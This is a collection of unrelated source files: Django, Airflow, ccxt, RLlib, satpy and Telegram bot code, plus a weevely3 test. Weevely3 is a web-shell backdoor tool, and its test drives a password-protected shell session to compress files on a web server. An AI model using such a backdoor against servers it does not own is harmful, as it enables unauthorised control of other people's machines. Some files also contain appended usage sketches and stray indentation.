if byte_length < 32: # at least 256 bit
raise ValueError(
'{} is too short; secrets must be longer than 32 bytes'
.format(byte_length))
return force_text(binascii.b2a_hex(os.urandom(byte_length)))
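# Illustrative usage sketch: how the helpers above are typically combined.
# The `user` below is a hypothetical UserProfile instance; the atomic()
# wrapper reflects the docstring requirement that new_jwt_credentials runs
# inside a db transaction.
from django.db import transaction
def issue_key_for(user):
    with transaction.atomic():
        credentials = APIKey.new_jwt_credentials(user)
    # credentials.key looks like "user:<pk>:<n>"; credentials.secret is hex,
    # so the default 32 random bytes yield a 64-character string.
    return credentials.key, credentials.secret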
|
epinna/weevely3
|
tests/test_file_bzip2.py
|
Python
|
gpl-3.0
| 5,554
| 0.009903
|
from tests.base_test import BaseTest
from tests import config
from core import modules
from core.sessions import SessionURL
from testfixtures import log_capture
from core import messages
import logging
import os
import subprocess
class FileBzip(BaseTest):
# Create and bzip2 binary files for the test
binstring = [
b'\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1',
b'\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00'
]
uncompressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1')
]
compressed = [
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile0.bz2'),
os.path.join(config.base_folder, 'test_file_bzip2', 'binfile1.bz2')
]
def setUp(self):
session = SessionURL(self.url, self.password, volatile = True)
modules.load_modules(session)
subprocess.check_output("""
BASE_FOLDER="{config.base_folder}/test_file_bzip2/"
rm -rf "$BASE_FOLDER"
mkdir -p "$BASE_FOLDER/"
echo -n '\\xe0\\xf5\\xfe\\xe2\\xbd\\x0c\\xbc\\x9b\\xa0\\x8f\\xed?\\xa1\\xe1' > "$BASE_FOLDER/binfile0"
echo -n '\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00' > "$BASE_FOLDER/binfile1"
bzip2 "$BASE_FOLDER/binfile0"
bzip2 "$BASE_FOLDER/binfile1"
chown www-data: -R "$BASE_FOLDER/"
""".format(
config = config
), shell=True)
self.run_argv = modules.loaded['file_bzip2'].run_argv
def test_compress_decompress(self):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[0]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Recompress it keeping the original file
self.assertTrue(self.run_argv([self.uncompressed[0], '--keep']))
        # Check the existence of the original file and remove it
subprocess.check_call('stat -c %%a "%s"' % self.uncompressed[0], shell=True)
subprocess.check_call('rm "%s"' % self.uncompressed[0], shell=True)
#Do the same check
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
def test_compress_decompress_multiple(self):
for index in range(0, len(self.compressed)):
# Decompress and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
# Let's re-compress it, and decompress and check again
self.assertTrue(self.run_argv([self.uncompressed[index]]))
self.assertTrue(self.run_argv(["--decompress", self.compressed[index]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[index], shell=True),
self.binstring[index]
)
@log_capture()
def test_already_exists(self, log_captured):
# Decompress keeping it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0], '--keep']));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Do it again and trigger that the file decompressed already exists
self.assertIsNone(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping decompressing" % self.uncompressed[0])
# Compress and trigger that the file compressed already exists
self.assertIsNone(self.run_argv([self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"File '%s' already exists, skipping compressing" % self.compressed[0])
@log_capture()
def test_wrong_ext(self, log_captured):
# Decompress it and check test file
self.assertTrue(self.run_argv(["--decompress", self.compressed[0]]));
self.assertEqual(
subprocess.check_output('cat "%s"' % self.uncompressed[0], shell=True),
self.binstring[0]
)
# Decompress the decompressed, wrong ext
self.assertIsNone(self.run_argv(["--decompress", self.uncompressed[0]]));
self.assertEqual(log_captured.records[-1].msg,
"Unknown suffix, skipping decompressing")
@log_capture()
def test_unexistant(self, log_captured):
# Decompress it and check test file
self.assertIsNone(self.run_argv(["--decompress", 'bogus']));
self.assertEqual(log_captured.records[-1].msg,
"Skipping file '%s', check existance and permission" % 'bogus')
|
Karaage-Cluster/karaage
|
karaage/common/__init__.py
|
Python
|
gpl-3.0
| 5,700
| 0
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage.  If not, see <http://www.gnu.org/licenses/>.
import datetime
import importlib
import warnings
import django
import six
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.http import HttpResponseRedirect, QueryDict
from django.shortcuts import render
from django.urls import reverse
from karaage.common.forms import CommentForm
from karaage.common.models import ADDITION, CHANGE, COMMENT, DELETION, LogEntry
from karaage.middleware.threadlocals import get_current_user
from karaage.plugins import BasePlugin
def get_date_range(request, default_start=None, default_end=None):
if default_start is None:
default_start = datetime.date.today() - datetime.timedelta(days=90)
if default_end is None:
default_end = datetime.date.today()
today = datetime.date.today()
if 'start' in request.GET:
try:
years, months, days = request.GET['start'].split('-')
start = datetime.datetime(int(years), int(months), int(days))
start = start.date()
except ValueError:
start = today - datetime.timedelta(days=90)
else:
start = default_start
if 'end' in request.GET:
try:
years, months, days = request.GET['end'].split('-')
end = datetime.datetime(int(years), int(months), int(days))
end = end.date()
except ValueError:
end = today
else:
end = default_end
return start, end
def get_current_person():
user = get_current_user()
if user is None:
return None
if not user.is_authenticated:
return None
return user
class log():
def __init__(self, user, obj, flag, message):
warnings.warn("Calling karaage.common.log directly has been"
" deprecated. You should use the API "
"log.(add|change|field_change|delete|comment)",
DeprecationWarning)
LogEntry.objects.log_object(obj, flag, message, user)
@classmethod
def add(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, ADDITION, message, user)
@classmethod
def change(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, CHANGE, message, user)
@classmethod
def field_change(cls, obj, user=None, field=None, new_value=None):
return LogEntry.objects.log_object(
obj, CHANGE, 'Changed %s to %s' % (field, new_value), user)
@classmethod
def delete(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, DELETION, message, user)
@classmethod
def comment(cls, obj, message, user=None):
return LogEntry.objects.log_object(obj, COMMENT, message, user)
def new_random_token():
import random
from hashlib import sha1
# Use the system (hardware-based) random number generator if it exists.
if hasattr(random, 'SystemRandom'):
randrange = random.SystemRandom().randrange
else:
randrange = random.randrange
max_key = 18446744073709551616 # 2 << 63
string = six.u("%s%s") % (randrange(0, max_key), settings.SECRET_KEY)
return sha1(string.encode("ascii")).hexdigest()
def log_list(request, breadcrumbs, obj):
    result = QueryDict("", mutable=True)
result['content_type'] = ContentType.objects.get_for_model(obj).pk
    result['object_id'] = obj.pk
url = reverse('kg_log_list') + "?" + result.urlencode()
return HttpResponseRedirect(url)
def add_comment(request, breadcrumbs, obj):
assert obj is not None
assert obj.pk is not None
form = CommentForm(
data=request.POST or None, obj=obj,
request=request, instance=None)
if request.method == 'POST':
form.save()
return HttpResponseRedirect(obj.get_absolute_url())
return render(
template_name='karaage/common/add_comment.html',
context={
'form': form, 'obj': obj,
'breadcrumbs': breadcrumbs,
},
request=request)
def is_admin(request):
if settings.ADMIN_IGNORED:
return False
if not request.user.is_authenticated:
return False
return request.user.is_admin
def get_app_modules(name):
if django.VERSION < (1, 7):
for app in settings.INSTALLED_APPS:
try:
module_name = app + "." + name
module = importlib.import_module(module_name)
yield module
except ImportError:
pass
else:
from django.apps import apps
for config in apps.get_app_configs():
if isinstance(config, BasePlugin):
module_name = config.name + "." + name
module = importlib.import_module(module_name)
yield module
def get_urls(name):
for module in get_app_modules("urls"):
urls = getattr(module, name, None)
if urls is not None:
yield urls
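# Illustrative usage sketch for get_date_range(); RequestFactory is only
# used here to fabricate a request, the function is normally called with
# the request object of a Django view.
from django.test import RequestFactory
_request = RequestFactory().get('/usage/?start=2017-01-01&end=2017-03-31')
_start, _end = get_date_range(_request)
# _start == datetime.date(2017, 1, 1) and _end == datetime.date(2017, 3, 31);
# missing or malformed parameters fall back to the defaults (last 90 days).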
|
mistercrunch/airflow
|
tests/sensors/test_external_task_sensor.py
|
Python
|
apache-2.0
| 35,537
| 0.002561
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import logging
import unittest
from datetime import time, timedelta
import pytest
from airflow import exceptions, settings
from airflow.exceptions import AirflowException, AirflowSensorTimeout
from airflow.models import DagBag, DagRun, TaskInstance
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.dummy import DummyOperator
from airflow.sensors.external_task import ExternalTaskMarker, ExternalTaskSensor
from airflow.sensors.time_sensor import TimeSensor
from airflow.serialization.serialized_objects import SerializedBaseOperator
from airflow.utils.session import provide_session
from airflow.utils.state import DagRunState, State, TaskInstanceState
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.db import clear_db_runs
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_test_dag'
TEST_TASK_ID = 'time_sensor_check'
TEST_TASK_ID_ALTERNATE = 'time_sensor_check_alternate'
DEV_NULL = '/dev/null'
@pytest.fixture(autouse=True)
def clean_db():
clear_db_runs()
class TestExternalTaskSensor(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag(dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
def test_time_sensor(self, task_id=TEST_TASK_ID):
op = TimeSensor(task_id=task_id, target_time=time(0), dag=self.dag)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_multiple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
        self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
dag=self.dag,
)
        op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_catch_overlap_allowed_failed_state(self):
with pytest.raises(AirflowException):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=[State.SUCCESS],
failed_states=[State.SUCCESS],
dag=self.dag,
)
def test_external_task_sensor_wrong_failed_states(self):
with pytest.raises(ValueError):
ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["invalid_state"],
dag=self.dag,
)
def test_external_task_sensor_failed_states(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
failed_states=["failed"],
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_failed_states_as_success(self):
self.test_time_sensor()
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check',
external_dag_id=TEST_DAG_ID,
external_task_id=TEST_TASK_ID,
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks [\'time_sensor_check\']'
' in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check'] in DAG "
"unit_test_dag failed."
)
def test_external_task_sensor_failed_states_as_success_mulitple_task_ids(self):
self.test_time_sensor(task_id=TEST_TASK_ID)
self.test_time_sensor(task_id=TEST_TASK_ID_ALTERNATE)
op = ExternalTaskSensor(
task_id='test_external_task_sensor_check_task_ids',
external_dag_id=TEST_DAG_ID,
external_task_ids=[TEST_TASK_ID, TEST_TASK_ID_ALTERNATE],
allowed_states=["failed"],
failed_states=["success"],
dag=self.dag,
)
with self.assertLogs(op.log, level=logging.INFO) as cm:
with pytest.raises(AirflowException) as ctx:
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
assert (
'INFO:airflow.task.operators:Poking for tasks '
'[\'time_sensor_check\', \'time_sensor_check_alternate\'] '
'in dag unit_test_dag on %s ... ' % DEFAULT_DATE.isoformat() in cm.output
)
assert (
str(ctx.value) == "Some of the external tasks "
"['time_sensor_check', 'time_sensor_check_alternate'] in DAG "
"unit_test_dag failed."
)
def test_external_dag_sensor(self):
other_dag = DAG('other_dag', default_args=self.args, end_date=DEFAULT_DATE, schedule_interval='@once')
other_dag.create_dagrun(
run_id='test', start_date=DEFAULT_DATE, execution_date=DEFAULT_DATE, state=State.SUCCESS
)
op = ExternalTaskSensor(
task_id='test_external_dag_sensor_check',
external_dag_id='other_dag',
external_task_id=None,
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_external_task_sensor_fn_multiple_execution_dates(self):
bash_command_code = """
{% set s=logical_date.time().second %}
echo "second is {{ s }}"
if [[ $(( {{ s }} % 60 )) == 1 ]]
then
exit 1
fi
exit 0
"""
dag_external_id = TEST_DAG_ID + '_external'
dag_external = DAG(dag_external_id, default_args=self.args, schedule_interval=timedelta(seconds=1))
task_external_with_failure = BashOperator(
task_id="task_external_with_failure", bash_command=bash_command_code, retries=0, dag=dag_external
)
task_external_without_failure = DummyOperator(
task_id="task_external_without_failure", retries=0, dag=dag_external
)
task_external_without_failure.run(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE + timedelta(seconds=1), ignore_ti_state=True
)
session = settings.Session()
TI
|
tritoanst/ccxt
|
python/ccxt/async/bit2c.py
|
Python
|
mit
| 6,650
| 0.001353
|
# -*- coding: utf-8 -*-
from ccxt.async.base.exchange import Exchange
import hashlib
class bit2c (Exchange):
def describe(self):
return self.deep_extend(super(bit2c, self).describe(), {
'id': 'bit2c',
'name': 'Bit2C',
'countries': 'IL', # Israel
'rateLimit': 3000,
'hasCORS': False,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/27766119-3593220e-5ece-11e7-8b3a-5a041f6bcc3f.jpg',
'api': 'https://www.bit2c.co.il',
'www': 'https://www.bit2c.co.il',
'doc': [
'https://www.bit2c.co.il/home/api',
'https://github.com/OferE/bit2c',
],
},
'api': {
'public': {
'get': [
'Exchanges/{pair}/Ticker',
'Exchanges/{pair}/orderbook',
'Exchanges/{pair}/trades',
],
},
'private': {
'post': [
'Account/Balance',
'Account/Balance/v2',
'Merchant/CreateCheckout',
'Order/AccountHistory',
'Order/AddCoinFundsRequest',
'Order/AddFund',
'Order/AddOrder',
'Order/AddOrderMarketPriceBuy',
'Order/AddOrderMarketPriceSell',
'Order/CancelOrder',
'Order/MyOrders',
'Payment/GetMyId',
'Payment/Send',
],
},
},
'markets': {
'BTC/NIS': {'id': 'BtcNis', 'symbol': 'BTC/NIS', 'base': 'BTC', 'quote': 'NIS'},
'BCH/NIS': {'id': 'BchNis', 'symbol': 'BCH/NIS', 'base': 'BCH', 'quote': 'NIS'},
'LTC/NIS': {'id': 'LtcNis', 'symbol': 'LTC/NIS', 'base': 'LTC', 'quote': 'NIS'},
'BTG/NIS': {'id': 'BtgNis', 'symbol': 'BTG/NIS', 'base': 'BTG', 'quote': 'NIS'},
},
'fees': {
'trading': {
'maker': 0.5 / 100,
'taker': 0.5 / 100,
},
},
})
async def fetch_balance(self, params={}):
balance = await self.privatePostAccountBalanceV2()
result = {'info': balance}
currencies = list(self.currencies.keys())
for i in range(0, len(currencies)):
currency = currencies[i]
account = self.account()
if currency in balance:
available = 'AVAILABLE_' + currency
account['free'] = balance[available]
account['total'] = balance[currency]
account['used'] = account['total'] - account['free']
result[currency] = account
return self.parse_balance(result)
async def fetch_order_book(self, symbol, params={}):
orderbook = await self.publicGetExchangesPairOrderbook(self.extend({
'pair': self.market_id(symbol),
}, params))
return self.parse_order_book(orderbook)
async def fetch_ticker(self, symbol, params={}):
ticker = await self.publicGetExchangesPairTicker(self.extend({
'pair': self.market_id(symbol),
}, params))
timestamp = self.milliseconds()
averagePrice = float(ticker['av'])
baseVolume = float(ticker['a'])
quoteVolume = baseVolume * averagePrice
return {
'symbol': symbol,
'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
'high': None,
'low': None,
'bid': float(ticker['h']),
'ask': float(ticker['l']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['ll']),
'change': None,
'percentage': None,
'average': averagePrice,
'baseVolume': baseVolume,
            'quoteVolume': quoteVolume,
'info': ticker,
}
def parse_trade(self, trade, market=None):
timestamp = int(trade['date']) * 1000
symbol = None
if market:
symbol = market['symbol']
return {
'id': str(trade['tid']),
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': None,
'type': None,
'side': None,
'price': trade['price'],
'amount': trade['amount'],
}
async def fetch_trades(self, symbol, since=None, limit=None, params={}):
market = self.market(symbol)
response = await self.publicGetExchangesPairTrades(self.extend({
'pair': market['id'],
}, params))
return self.parse_trades(response, market, since, limit)
async def create_order(self, symbol, type, side, amount, price=None, params={}):
method = 'privatePostOrderAddOrder'
order = {
'Amount': amount,
'Pair': self.market_id(symbol),
}
if type == 'market':
method += 'MarketPrice' + self.capitalize(side)
else:
order['Price'] = price
order['Total'] = amount * price
order['IsBid'] = (side == 'buy')
result = await getattr(self, method)(self.extend(order, params))
return {
'info': result,
'id': result['NewOrder']['id'],
}
async def cancel_order(self, id, symbol=None, params={}):
return await self.privatePostOrderCancelOrder({'id': id})
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.implode_params(path, params)
if api == 'public':
url += '.json'
else:
self.check_required_credentials()
nonce = self.nonce()
query = self.extend({'nonce': nonce}, params)
body = self.urlencode(query)
signature = self.hmac(self.encode(body), self.encode(self.secret), hashlib.sha512, 'base64')
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'key': self.apiKey,
'sign': self.decode(signature),
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
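# Illustrative signing sketch: a standalone restatement of what sign() does
# for private endpoints, using only the standard library; the key/secret
# values are placeholders, not real credentials.
import base64
import hashlib
import hmac
from urllib.parse import urlencode
_api_key, _api_secret = 'my-key', 'my-secret'          # placeholders
_body = urlencode({'nonce': 1234567890, 'Amount': 1})  # nonce + request params
_digest = hmac.new(_api_secret.encode(), _body.encode(), hashlib.sha512).digest()
_headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'key': _api_key,
    'sign': base64.b64encode(_digest).decode(),  # same as self.hmac(..., 'base64')
}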
|
richardliaw/ray
|
rllib/examples/models/batch_norm_model.py
|
Python
|
apache-2.0
| 7,538
| 0
|
import numpy as np
from ray.rllib.models.modelv2 import ModelV2
from ray.rllib.models.tf.misc import normc_initializer
from ray.rllib.models.tf.tf_modelv2 import TFModelV2
from ray.rllib.models.torch.misc import SlimFC, normc_initializer as \
torch_normc_initializer
from ray.rllib.models.torch.torch_modelv2 import TorchModelV2
from ray.rllib.utils.annotations import override
from ray.rllib.utils.framework import try_import_tf, try_import_torch
tf1, tf, tfv = try_import_tf()
torch, nn = try_import_torch()
class BatchNormModel(TFModelV2):
"""Example of a TFModelV2 that is built w/o using tf.keras.
NOTE: This example does not work when using a keras-based TFModelV2 due
to a bug in keras related to missing values for input placeholders, even
though these input values have been provided in a forward pass through the
actual keras Model.
All Model logic (layers) is defined in the `forward` method (incl.
the batch_normalization layers). Also, all variables are registered
(only once) at the end of `forward`, so an optimizer knows which tensors
to train on. A standard `value_function` override is used.
"""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
# Have we registered our vars yet (see `forward`)?
self._registered = False
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
last_layer = input_dict["obs"]
hiddens = [256, 256]
with tf1.variable_scope("model", reuse=tf1.AUTO_REUSE):
for i, size in enumerate(hiddens):
last_layer = tf1.layers.dense(
last_layer,
size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name="fc{}".format(i))
# Add a batch norm layer
last_layer = tf1.layers.batch_normalization(
last_layer,
training=input_dict["is_training"],
name="bn_{}".format(i))
output = tf1.layers.dense(
last_layer,
self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="out")
self._value_out = tf1.layers.dense(
last_layer,
1,
kernel_initializer=normc_initializer(1.0),
activation=None,
name="vf")
if not self._registered:
self.register_variables(
tf1.get_collection(
tf1.GraphKeys.TRAINABLE_VARIABLES, scope=".+/model/.+"))
self._registered = True
return output, []
@override(ModelV2)
def value_function(self):
        return tf.reshape(self._value_out, [-1])
class KerasBatchNormModel(TFModelV2):
"""Keras version of above BatchNormModel with exactly the same structure.
    IMPORTANT NOTE: This model will not work with PPO due to a bug in keras
    that surfaces when having more than one input placeholder (here: `inputs`
    and `is_training`) AND using the `make_tf_callable` helper (e.g. used by
    PPO), in which auto-placeholders are generated, then passed through the
    tf.keras.models.Model. In this last step, the connection between 1) the
provided value in the auto-placeholder and 2) the keras `is_training`
Input is broken and keras complains.
Use the above `BatchNormModel` (a non-keras based TFModelV2), instead.
"""
def __init__(self, obs_space, action_space, num_outputs, model_config,
name):
super().__init__(obs_space, action_space, num_outputs, model_config,
name)
inputs = tf.keras.layers.Input(shape=obs_space.shape, name="inputs")
is_training = tf.keras.layers.Input(
shape=(), dtype=tf.bool, batch_size=1, name="is_training")
last_layer = inputs
hiddens = [256, 256]
for i, size in enumerate(hiddens):
label = "fc{}".format(i)
last_layer = tf.keras.layers.Dense(
units=size,
kernel_initializer=normc_initializer(1.0),
activation=tf.nn.tanh,
name=label)(last_layer)
# Add a batch norm layer
last_layer = tf.keras.layers.BatchNormalization()(
last_layer, training=is_training[0])
output = tf.keras.layers.Dense(
units=self.num_outputs,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="fc_out")(last_layer)
value_out = tf.keras.layers.Dense(
units=1,
kernel_initializer=normc_initializer(0.01),
activation=None,
name="value_out")(last_layer)
self.base_model = tf.keras.models.Model(
inputs=[inputs, is_training], outputs=[output, value_out])
self.register_variables(self.base_model.variables)
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
out, self._value_out = self.base_model(
[input_dict["obs"], input_dict["is_training"]])
return out, []
@override(ModelV2)
def value_function(self):
return tf.reshape(self._value_out, [-1])
class TorchBatchNormModel(TorchModelV2, nn.Module):
"""Example of a TorchModelV2 using batch normalization."""
capture_index = 0
def __init__(self, obs_space, action_space, num_outputs, model_config,
name, **kwargs):
TorchModelV2.__init__(self, obs_space, action_space, num_outputs,
model_config, name)
nn.Module.__init__(self)
layers = []
prev_layer_size = int(np.product(obs_space.shape))
self._logits = None
# Create layers 0 to second-last.
for size in [256, 256]:
layers.append(
SlimFC(
in_size=prev_layer_size,
out_size=size,
initializer=torch_normc_initializer(1.0),
activation_fn=nn.ReLU))
prev_layer_size = size
# Add a batch norm layer.
layers.append(nn.BatchNorm1d(prev_layer_size))
self._logits = SlimFC(
in_size=prev_layer_size,
out_size=self.num_outputs,
initializer=torch_normc_initializer(0.01),
activation_fn=None)
self._value_branch = SlimFC(
in_size=prev_layer_size,
out_size=1,
initializer=torch_normc_initializer(1.0),
activation_fn=None)
self._hidden_layers = nn.Sequential(*layers)
self._hidden_out = None
@override(ModelV2)
def forward(self, input_dict, state, seq_lens):
# Set the correct train-mode for our hidden module (only important
# b/c we have some batch-norm layers).
self._hidden_layers.train(mode=input_dict.get("is_training", False))
self._hidden_out = self._hidden_layers(input_dict["obs"])
logits = self._logits(self._hidden_out)
return logits, []
@override(ModelV2)
def value_function(self):
assert self._hidden_out is not None, "must call forward first!"
return torch.reshape(self._value_branch(self._hidden_out), [-1])
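# Illustrative registration sketch: how a custom model like the ones above
# is typically plugged into RLlib; the model name and config values are
# illustrative, not taken from this file.
from ray.rllib.models import ModelCatalog
ModelCatalog.register_custom_model('bn_model', TorchBatchNormModel)
example_config = {
    'model': {'custom_model': 'bn_model'},
    'framework': 'torch',
}
# example_config can then be passed to a trainer, e.g.
# ray.rllib.agents.ppo.PPOTrainer(config=example_config, env='CartPole-v0').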
|
pytroll/satpy
|
satpy/modifiers/__init__.py
|
Python
|
gpl-3.0
| 1,328
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2020 Satpy developers
#
# This file is part of satpy.
#
# satpy is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# satpy is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# satpy. If not, see <http://www.gnu.org/licenses/>.
"""Modifier classes and other r
|
elated utilities."""
# file deepcode ignore W0611: Ignore unused imports in init module
from .base import ModifierBase # noqa: F401, isort: skip
from .atmosphere import CO2Corrector # noqa: F401
from .atmosphere import PSPAtmosphericalCorrection # noqa: F401
from .atmosphere import PSPRayleighReflectance # noqa: F401
from .geometry import EffectiveSolarPathLengthCorrector # noqa: F401
from .geometry import SunZenithCorrector  # noqa: F401
from .spectral import NIREmissivePartFromReflectance # noqa: F401
from .spectral import NIRReflectance # noqa: F401
|
franciscod/python-telegram-bot
|
telegram/inlinequeryresultcachedvideo.py
|
Python
|
gpl-2.0
| 2,181
| 0.001376
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2016
# Leandro Toledo de Souza <devs@python-telegram-bot.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module
|
contains the classes that represent Telegram
InlineQueryResultCachedVideo"""
from telegram import InlineQueryResult, InlineKeyboardMarkup, InputMessageContent
class InlineQueryResultCachedVideo(InlineQueryResult):
def __init__(self,
id,
video_file_id,
title,
description=None,
caption=None,
reply_markup=None,
input_message_content=None,
**kwargs):
# Required
super(InlineQueryResultCachedVideo, self).__init__('video', id)
self.video_file_id = video_file_id
self.title = title
# Optionals
if description:
self.description = description
if caption:
self.caption = caption
if reply_markup:
self.reply_markup = reply_markup
if input_message_content:
self.input_message_content = input_message_content
@staticmethod
def de_json(data):
data = super(InlineQueryResultCachedVideo, InlineQueryResultCachedVideo).de_json(data)
data['reply_markup'] = InlineKeyboardMarkup.de_json(data.get('reply_markup'))
data['input_message_content'] = InputMessageContent.de_json(data.get(
'input_message_content'))
return InlineQueryResultCachedVideo(**data)
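# Illustrative usage sketch, using the class defined above; the file_id is
# a placeholder and assumes the video was previously uploaded to Telegram.
example_result = InlineQueryResultCachedVideo(
    id='1',
    video_file_id='BAADBAADexample_file_id',  # placeholder
    title='Cached video',
    caption='Re-sent by file_id')
# A bot would then answer the inline query with results=[example_result].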
|
eikiu/tdf-actividades
|
_admin-scripts/tdf_gcal.py
|
Python
|
cc0-1.0
| 28,476
| 0.034032
|
#!/usr/bin/python3
'''
Calculate posting schedules in social media of events and add them to google calendar
so they can be posted using IFTTT (so dirty!)
'''
